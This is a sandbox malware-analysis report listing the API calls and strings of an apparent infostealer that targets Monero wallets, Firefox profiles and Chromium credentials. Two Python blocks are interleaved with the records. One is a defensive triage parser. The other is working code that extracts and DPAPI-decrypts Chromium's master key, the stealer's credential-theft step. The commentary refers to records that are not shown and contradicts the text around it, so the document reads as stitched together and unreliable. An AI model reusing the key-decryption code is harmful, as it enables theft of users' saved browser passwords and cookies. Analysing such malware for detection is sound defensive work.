                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AdjustPointer
                            • String ID:
                            • API String ID: 1740715915-0
                            • Opcode ID: 06145f3a63d5280db2389d3658a688964ecb7b0d80857c6917ca60528e3905ca
                            • Instruction ID: 7da9ecb5b7c1fd74cd4906d2d81ac0354529694b38d4d991c6d3f4d81a44a7a0
                            • Opcode Fuzzy Hash: 06145f3a63d5280db2389d3658a688964ecb7b0d80857c6917ca60528e3905ca
                            • Instruction Fuzzy Hash: EB51DC72600202EFEB298F14CD42BFBB3A5EF01308F24652DE815A6691E732ED41DB90
                            APIs
                            • LocalAlloc.KERNEL32(00000040,?), ref: 00E4A664
                              • Part of subcall function 00E5AA50: lstrcpy.KERNEL32(00E60E1A,00000000), ref: 00E5AA98
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocLocallstrcpy
                            • String ID: @$v10$v20
                            • API String ID: 2746078483-278772428
                            • Opcode ID: 9f3c226d366b7ba1801a2d001f7e36382aebb975947848bf3c37bfa221ad9915
                            • Instruction ID: 8758a702bf1d0d53bb91cd9665dfb7ab2f004d2bad77031c4952232e44e94815
                            • Opcode Fuzzy Hash: 9f3c226d366b7ba1801a2d001f7e36382aebb975947848bf3c37bfa221ad9915
                            • Instruction Fuzzy Hash: 84518D70A40208EFDB24EFA4DD96FED73B5AF44344F04A528F90A7B291DB706A49CB51
                            APIs
                              • Part of subcall function 00E5AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00E5AAF6
                              • Part of subcall function 00E4A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00E4A13C
                              • Part of subcall function 00E4A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00E4A161
                              • Part of subcall function 00E4A110: LocalAlloc.KERNEL32(00000040,?), ref: 00E4A181
                              • Part of subcall function 00E4A110: ReadFile.KERNEL32(000000FF,?,00000000,00E4148F,00000000), ref: 00E4A1AA
                              • Part of subcall function 00E4A110: LocalFree.KERNEL32(00E4148F), ref: 00E4A1E0
                              • Part of subcall function 00E4A110: CloseHandle.KERNEL32(000000FF), ref: 00E4A1EA
                              • Part of subcall function 00E58FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00E58FE2
                              • Part of subcall function 00E5AA50: lstrcpy.KERNEL32(00E60E1A,00000000), ref: 00E5AA98
                              • Part of subcall function 00E5ACC0: lstrlen.KERNEL32(?,009C99B8,?,\Monero\wallet.keys,00E60E1A), ref: 00E5ACD5
                              • Part of subcall function 00E5ACC0: lstrcpy.KERNEL32(00000000), ref: 00E5AD14
                              • Part of subcall function 00E5ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E5AD22
                              • Part of subcall function 00E5ABB0: lstrcpy.KERNEL32(?,00E60E1A), ref: 00E5AC15
                              • Part of subcall function 00E5AC30: lstrcpy.KERNEL32(00000000,?), ref: 00E5AC82
                              • Part of subcall function 00E5AC30: lstrcat.KERNEL32(00000000), ref: 00E5AC92
                            • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00E61678,00E60D93), ref: 00E4F64C
                            • lstrlen.KERNEL32(00000000), ref: 00E4F66B
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                            • String ID: ^userContextId=4294967295$moz-extension+++
                            • API String ID: 998311485-3310892237
                            • Opcode ID: a26392965ae9fa252df13bf5cd0c9f297c6e6c23d6860d67fbf131cb60bbdef0
                            • Instruction ID: 53e99b9e62e769e12b0e8e3aad965bed6ecb5ecd76bec4ff83674374feedd47f
                            • Opcode Fuzzy Hash: a26392965ae9fa252df13bf5cd0c9f297c6e6c23d6860d67fbf131cb60bbdef0
                            • Instruction Fuzzy Hash: 14514271D101089BCB04FBA0ED62DED73B9AF54341F089A78F81677191EE346A0CCBA2
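The function records in this section are easier to triage by machine than by eye: the three CopyFileA/DeleteFileA routines above reach `\Monero\wallet.keys` only through subcalls, the Firefox profile strings (`moz-extension+++`, `^userContextId=4294967295`) sit in the String ID field rather than in any API argument, and the Chromium `"encrypted_key":"` / CryptStringToBinaryA / CryptUnprotectData chain further below is split across a direct call and two subcalls. The following is an added example, not part of the Joe Sandbox report: a parser for this record format that groups each function's direct and subcall API references and flags three credential-access patterns. The sample input is an abridged, constructed copy of three records from this section (the Chromium record's IDs are cut off on the page, so placeholders stand in for them); the rule names are my own labels, not Joe Sandbox signatures.

```python
import re
from dataclasses import dataclass, field
from typing import List, Tuple

# One "• Api.MODULE(args), ref: ADDR" line, optionally prefixed with the
# "Part of subcall function ADDR:" marker the report uses for callee APIs.
CALL_RE = re.compile(
    r"^(?:Part of subcall function (?P<via>[0-9A-F]{8}): )?"
    r"(?P<api>\w+)\.(?P<module>\w+)(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-F]{8})$"
)


@dataclass
class Call:
    api: str
    module: str
    args: List[str]
    ref: str
    via: str = ""  # address of the callee when the API is reached through a subcall


@dataclass
class FunctionRecord:
    calls: List[Call] = field(default_factory=list)
    strings: List[str] = field(default_factory=list)  # "String ID" entries, '$'-separated in the report
    api_id: str = ""
    opcode_id: str = ""
    instruction_id: str = ""


def parse_records(text: str) -> List[FunctionRecord]:
    """Split the report's function dump into records; each ends at its Instruction Fuzzy Hash line."""
    records, cur = [], FunctionRecord()
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("•"):
            line = line[1:].strip()
        if not line:
            continue
        m = CALL_RE.match(line)
        if m:
            args = m["args"].split(",") if m["args"] else []
            cur.calls.append(Call(m["api"], m["module"], args, m["ref"], m["via"] or ""))
        elif line.startswith("String ID:"):
            value = line[len("String ID:"):].strip()
            cur.strings = value.split("$") if value else []
        elif line.startswith("API ID:"):
            cur.api_id = line[len("API ID:"):].strip()
        elif line.startswith("Opcode ID:"):
            cur.opcode_id = line[len("Opcode ID:"):].strip()
        elif line.startswith("Instruction ID:"):
            cur.instruction_id = line[len("Instruction ID:"):].strip()
        elif line.startswith("Instruction Fuzzy Hash:"):
            records.append(cur)
            cur = FunctionRecord()
    return records


def api_names(rec: FunctionRecord, direct_only: bool = False) -> set:
    return {c.api for c in rec.calls if not (direct_only and c.via)}


def arg_values(rec: FunctionRecord) -> List[str]:
    return [a for c in rec.calls for a in c.args]


# Credential-access patterns visible in this report's records (labels are mine).
RULES = [
    ("chromium_master_key_decrypt",
     lambda r: {"CryptStringToBinaryA", "CryptUnprotectData"} <= api_names(r)
               or any('"encrypted_key":"' in a for a in arg_values(r))),
    ("wallet_file_copy_then_delete",
     lambda r: {"CopyFileA", "DeleteFileA"} <= api_names(r, direct_only=True)
               and any("wallet" in a.lower() for a in arg_values(r))),
    ("firefox_profile_strings",
     lambda r: any("moz-extension" in s or "userContextId" in s for s in r.strings)),
]


def triage(text: str) -> List[Tuple[str, List[str]]]:
    """Return (instruction_id, matched rule names) for every record that matches a rule."""
    hits = []
    for rec in parse_records(text):
        matched = [name for name, pred in RULES if pred(rec)]
        if matched:
            hits.append((rec.instruction_id, matched))
    return hits


# Constructed, abridged copy of three records from the report (same line format).
SAMPLE = r"""
APIs
  • Part of subcall function 00E5ACC0: lstrlen.KERNEL32(?,009C99B8,?,\Monero\wallet.keys,00E60E1A), ref: 00E5ACD5
  • Part of subcall function 00E58CF0: GetSystemTime.KERNEL32(00E60E1B,009CB1A0), ref: 00E58D16
• CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00E4AA11
• lstrlen.KERNEL32(00000000,00000000), ref: 00E4AB2F
• DeleteFileA.KERNEL32(00000000), ref: 00E4AE73
Memory Dump Source
• Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
Similarity
• API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
• String ID:
• Opcode ID: a2ac0260e1629efbc8823c718b1623ca8d61b81683c0dd4c45f699a70b8f3c73
• Instruction ID: 6209ce1b478a248da2c710527a88a4e0921f8fec004f7ccdbfd4f038e1025b94
• Instruction Fuzzy Hash: FFE116729101089BCB54FBA4DDA2EEEB37DAF14301F449A79F51672191EF306A4CCBA1
APIs
• StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00E61678,00E60D93), ref: 00E4F64C
• lstrlen.KERNEL32(00000000), ref: 00E4F66B
Similarity
• API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
• String ID: ^userContextId=4294967295$moz-extension+++
• Opcode ID: a26392965ae9fa252df13bf5cd0c9f297c6e6c23d6860d67fbf131cb60bbdef0
• Instruction ID: 53e99b9e62e769e12b0e8e3aad965bed6ecb5ecd76bec4ff83674374feedd47f
• Instruction Fuzzy Hash: 14514271D101089BCB04FBA0ED62DED73B9AF54341F089A78F81677191EE346A0CCBA2
APIs
• StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00E4A489
  • Part of subcall function 00E4A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O,00000000,00000000), ref: 00E4A23F
  • Part of subcall function 00E4A2B0: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00E4A2D4
  • Part of subcall function 00E4A2B0: LocalFree.KERNEL32(?), ref: 00E4A323
Similarity
• String ID:
• Instruction ID: (truncated in the report)
• Instruction Fuzzy Hash: (truncated in the report)
"""

if __name__ == "__main__":
    for instruction_id, rules in triage(SAMPLE):
        print(instruction_id, rules)
```

Records are keyed by Instruction ID because that is the value that stays stable across the report's duplicate dumps of the same function (the three wallet routines share an API ID but differ in Instruction ID). The wallet rule insists on CopyFileA and DeleteFileA being direct calls but lets the path come from a subcall, which is exactly how the report presents those routines.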
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen
                            • String ID:
                            • API String ID: 367037083-0
                            • Opcode ID: 82a64908fd6c4d8de0a06c95fcc3de914d1a5ed645f27bd21211fa617a2c010a
                            • Instruction ID: f9aa454ee3eaafc367647df1fe6d171c11771ad62cbce12889a6bd3c27597646
                            • Opcode Fuzzy Hash: 82a64908fd6c4d8de0a06c95fcc3de914d1a5ed645f27bd21211fa617a2c010a
                            • Instruction Fuzzy Hash: 6A417571D002099FCF18EFB4D955AEEB7B8AF44345F049928F81677281EB70AA49CF91
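The record that follows chains StrStrA for the literal `"encrypted_key":"`, CryptStringToBinaryA with dwFlags 1 (CRYPT_STRING_BASE64) and CryptUnprotectData with null entropy and no prompt: the standard way of recovering the Chromium master key from the browser's Local State file, which DFIR browser-artifact tools perform for the same reason. As an added example (my code, not the sample's and not from the report), the Python below reproduces those three steps on a constructed Local State fragment. The strip of the leading `b"DPAPI"` bytes is known Chromium behaviour that the report does not show; the function names and the sample key bytes are mine.

```python
import base64
import ctypes
import json
import sys

# Chromium stores its AES-GCM master key in "Local State" under os_crypt.encrypted_key:
# base64 of the literal b"DPAPI" followed by a CryptProtectData blob. The prefix is
# known Chromium behaviour (os_crypt_win.cc); the report only shows the substring
# search, the base64 decode and the CryptUnprotectData call.
DPAPI_PREFIX = b"DPAPI"


def find_encrypted_key(local_state: str) -> str:
    """Raw substring extraction, mirroring StrStrA(buf, '"encrypted_key":"') in the report."""
    marker = '"encrypted_key":"'
    start = local_state.find(marker)
    if start < 0:
        raise ValueError("no encrypted_key in Local State")
    start += len(marker)
    end = local_state.index('"', start)
    return local_state[start:end]


def unwrap_dpapi_blob(b64_key: str) -> bytes:
    """CryptStringToBinaryA(..., CRYPT_STRING_BASE64, ...) followed by the prefix check."""
    raw = base64.b64decode(b64_key, validate=True)
    if not raw.startswith(DPAPI_PREFIX):
        raise ValueError("encrypted_key is not DPAPI-wrapped")
    return raw[len(DPAPI_PREFIX):]


class DATA_BLOB(ctypes.Structure):
    _fields_ = [("cbData", ctypes.c_uint32), ("pbData", ctypes.POINTER(ctypes.c_char))]


def dpapi_unprotect(blob: bytes) -> bytes:
    """CryptUnprotectData(in, NULL, NULL, NULL, NULL, 0, out), the call at 00E4A2D4 in the report.
    Windows only, and only in the user context that protected the blob."""
    if sys.platform != "win32":
        raise OSError("DPAPI is only available on Windows")
    crypt32 = ctypes.windll.crypt32
    kernel32 = ctypes.windll.kernel32
    buf = ctypes.create_string_buffer(blob, len(blob))  # keep alive while crypt32 reads it
    blob_in = DATA_BLOB(len(blob), ctypes.cast(buf, ctypes.POINTER(ctypes.c_char)))
    blob_out = DATA_BLOB()
    ok = crypt32.CryptUnprotectData(ctypes.byref(blob_in), None, None, None, None, 0,
                                    ctypes.byref(blob_out))
    if not ok:
        raise ctypes.WinError()
    try:
        return ctypes.string_at(blob_out.pbData, blob_out.cbData)
    finally:
        kernel32.LocalFree(blob_out.pbData)  # the report's routine frees with LocalFree as well


def master_key_from_local_state(local_state: str) -> bytes:
    """The full chain: locate, base64-decode, strip the prefix, DPAPI-unprotect."""
    return dpapi_unprotect(unwrap_dpapi_blob(find_encrypted_key(local_state)))


# Constructed Local State fragment: "DPAPI" plus 16 placeholder bytes, base64-encoded.
# Chromium writes this file without whitespace, so the JSON is serialised compactly.
SAMPLE_LOCAL_STATE = json.dumps(
    {"os_crypt": {"encrypted_key": base64.b64encode(DPAPI_PREFIX + b"\x01" * 16).decode()}},
    separators=(",", ":"),
)

if __name__ == "__main__":
    print(unwrap_dpapi_blob(find_encrypted_key(SAMPLE_LOCAL_STATE)).hex())
```

Two details worth keeping in mind when reproducing this in a lab: the substring search only works because Chromium serialises Local State without spaces, so a pretty-printed fixture will make this style of code fail to find the key, and CryptUnprotectData with no entropy succeeds only under the account that protected the blob, which is why the stealer decrypts in the victim's session rather than exfiltrating Local State as a file.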
                            APIs
                              • Part of subcall function 00E5AA50: lstrcpy.KERNEL32(00E60E1A,00000000), ref: 00E5AA98
                              • Part of subcall function 00E4A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00E4A13C
                              • Part of subcall function 00E4A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00E4A161
                              • Part of subcall function 00E4A110: LocalAlloc.KERNEL32(00000040,?), ref: 00E4A181
                              • Part of subcall function 00E4A110: ReadFile.KERNEL32(000000FF,?,00000000,00E4148F,00000000), ref: 00E4A1AA
                              • Part of subcall function 00E4A110: LocalFree.KERNEL32(00E4148F), ref: 00E4A1E0
                              • Part of subcall function 00E4A110: CloseHandle.KERNEL32(000000FF), ref: 00E4A1EA
                              • Part of subcall function 00E58FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00E58FE2
                            • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00E4A489
                              • Part of subcall function 00E4A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O,00000000,00000000), ref: 00E4A23F
                              • Part of subcall function 00E4A210: LocalAlloc.KERNEL32(00000040,?,?,?,00E44F3E,00000000,?), ref: 00E4A251
                              • Part of subcall function 00E4A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O,00000000,00000000), ref: 00E4A27A
                              • Part of subcall function 00E4A210: LocalFree.KERNEL32(?,?,?,?,00E44F3E,00000000,?), ref: 00E4A28F
                              • Part of subcall function 00E4A2B0: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00E4A2D4
                              • Part of subcall function 00E4A2B0: LocalAlloc.KERNEL32(00000040,00000000), ref: 00E4A2F3
                              • Part of subcall function 00E4A2B0: LocalFree.KERNEL32(?), ref: 00E4A323
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmp
                            Similarity
                            • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                            • String ID: $"encrypted_key":"$DPAPI
                            • API String ID: 2100535398-738592651
                            • Opcode ID: 72174162343a8f44e65d45ed3e3c9ec578af7e327a691e2cd70cf270bc4c2477
                            • Instruction ID: 37cd53356b595283fbd3f6bc4bad90e80df173179a8e8d68c0b49a6511dc902c
                            • Opcode Fuzzy Hash: 72174162343a8f44e65d45ed3e3c9ec578af7e327a691e2cd70cf270bc4c2477
                            • Instruction Fuzzy Hash: 333130B6D40209ABDF04DFA4FD45AEEB7B8AB58304F085568E901B7241E7349A04CBA2
                            APIs
                              • Part of subcall function 00E5AA50: lstrcpy.KERNEL32(00E60E1A,00000000), ref: 00E5AA98
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00E605BF), ref: 00E5885A
                            • Process32First.KERNEL32(?,00000128), ref: 00E5886E
                            • Process32Next.KERNEL32(?,00000128), ref: 00E58883
                              • Part of subcall function 00E5ACC0: lstrlen.KERNEL32(?,009C99B8,?,\Monero\wallet.keys,00E60E1A), ref: 00E5ACD5
                              • Part of subcall function 00E5ACC0: lstrcpy.KERNEL32(00000000), ref: 00E5AD14
                              • Part of subcall function 00E5ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E5AD22
                              • Part of subcall function 00E5ABB0: lstrcpy.KERNEL32(?,00E60E1A), ref: 00E5AC15
                            • CloseHandle.KERNEL32(?), ref: 00E588F1
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            Similarity
                            • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                            • String ID:
                            • API String ID: 1066202413-0
                            • Opcode ID: 49f71f3f1cc7515a6c008eaae2de9ff65b039cf64ff2b936bae476036096f439
                            • Instruction ID: d8895c375e38aabc8d412060a287d1eb5528d327e288d84679da2ce0928e3f7e
                            • Opcode Fuzzy Hash: 49f71f3f1cc7515a6c008eaae2de9ff65b039cf64ff2b936bae476036096f439
                            • Instruction Fuzzy Hash: 223171719012189BCB64DF54DD51FEEF3B8FB44701F505AA9F50AB2290DB306A48CFA1
                            APIs
                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00EBFE13
                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00EBFE2C
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            Similarity
                            • API ID: Value___vcrt_
                            • String ID:
                            • API String ID: 1426506684-0
                            • Opcode ID: 78a688fa4b1a268c6419ddf2d244e6a3897435511f5bfa7c2bb3e66ac9c61958
                            • Instruction ID: 61778e17d1d89935569712e93b8bdebf8109624ece5ff2c55141d739c5e224c2
                            • Opcode Fuzzy Hash: 78a688fa4b1a268c6419ddf2d244e6a3897435511f5bfa7c2bb3e66ac9c61958
                            • Instruction Fuzzy Hash: B901B132609761AEF63526745DCAEB72694EB027B9730533EF616A41F3EF928C429240
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00E60DE8,00000000,?), ref: 00E57B40
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00E57B47
                            • GetLocalTime.KERNEL32(?,?,?,?,?,00E60DE8,00000000,?), ref: 00E57B54
                            • wsprintfA.USER32 ref: 00E57B83
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            Similarity
                            • API ID: Heap$AllocateLocalProcessTimewsprintf
                            • String ID:
                            • API String ID: 377395780-0
                            • Opcode ID: 1b3c287adf65e90400ee54a1671aceb08c06e118da5d19d0a0a6e67712299a2b
                            • Instruction ID: 65098db9b4a0f75f4e9bfe7981b3b5635975088418aec8162639384e6b6aab6f
                            • Opcode Fuzzy Hash: 1b3c287adf65e90400ee54a1671aceb08c06e118da5d19d0a0a6e67712299a2b
                            • Instruction Fuzzy Hash: A0112AB2904218ABCB24DBC9DD45BFEF7B9EB4CB11F10411AF615A2284D6395980C7B0
                            APIs
                            • __getptd.LIBCMT ref: 00E5CA7E
                              • Part of subcall function 00E5C2A0: __amsg_exit.LIBCMT ref: 00E5C2B0
                            • __getptd.LIBCMT ref: 00E5CA95
                            • __amsg_exit.LIBCMT ref: 00E5CAA3
                            • __updatetlocinfoEx_nolock.LIBCMT ref: 00E5CAC7
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            Similarity
                            • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                            • String ID:
                            • API String ID: 300741435-0
                            • Opcode ID: 79a826997d762ad51c31ea4a6544085f519852cc41d93cca42060236cd61e678
                            • Instruction ID: 136853a216a1688721e8792800172e5d23026ca60b2f44e6b039fc9fe906b393
                            • Opcode Fuzzy Hash: 79a826997d762ad51c31ea4a6544085f519852cc41d93cca42060236cd61e678
                            • Instruction Fuzzy Hash: 32F096319447149FD620FBB8581375E37E0AF00757F30394AFD06B61D3CB645948CA96
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            Similarity
                            • API ID: Catch
                            • String ID: MOC$RCC
                            • API String ID: 78271584-2084237596
                            • Opcode ID: 0af11e6eed5334c4ff19d0facd52f0310ea7249913ed55efd4c21f0934d53438
                            • Instruction ID: 7856c120bd3b1458e7e3fd82fd2e745e60d21e248b582fe8673197fca9d8f300
                            • Opcode Fuzzy Hash: 0af11e6eed5334c4ff19d0facd52f0310ea7249913ed55efd4c21f0934d53438
                            • Instruction Fuzzy Hash: 78414771900209EFCF26DF98DE81FEEBBB5AF48308F189199F91476211D2369A61DF50
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID: T8
                            • API String ID: 0-1243456643
                            • Opcode ID: ebee7b7bad02afd5c38f62567c68525325c0f01fa4448d3b7adcdae8bc16ad3d
                            • Instruction ID: 302259893e839c4512510cd6b4e69b5ddecf2f0fb130a413937b317f8446b30e
                            • Opcode Fuzzy Hash: ebee7b7bad02afd5c38f62567c68525325c0f01fa4448d3b7adcdae8bc16ad3d
                            • Instruction Fuzzy Hash: B42192F1600205BF9B10AF71CA81E6B77E9AF10368710951EF926B7551D733EE028B91
                            APIs
                              • Part of subcall function 00E58F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00E58F9B
                            • lstrcat.KERNEL32(?,00000000), ref: 00E551CA
                            • lstrcat.KERNEL32(?,00E61058), ref: 00E551E7
                            • lstrcat.KERNEL32(?,009C9A28), ref: 00E551FB
                            • lstrcat.KERNEL32(?,00E6105C), ref: 00E5520D
                              • Part of subcall function 00E54B60: wsprintfA.USER32 ref: 00E54B7C
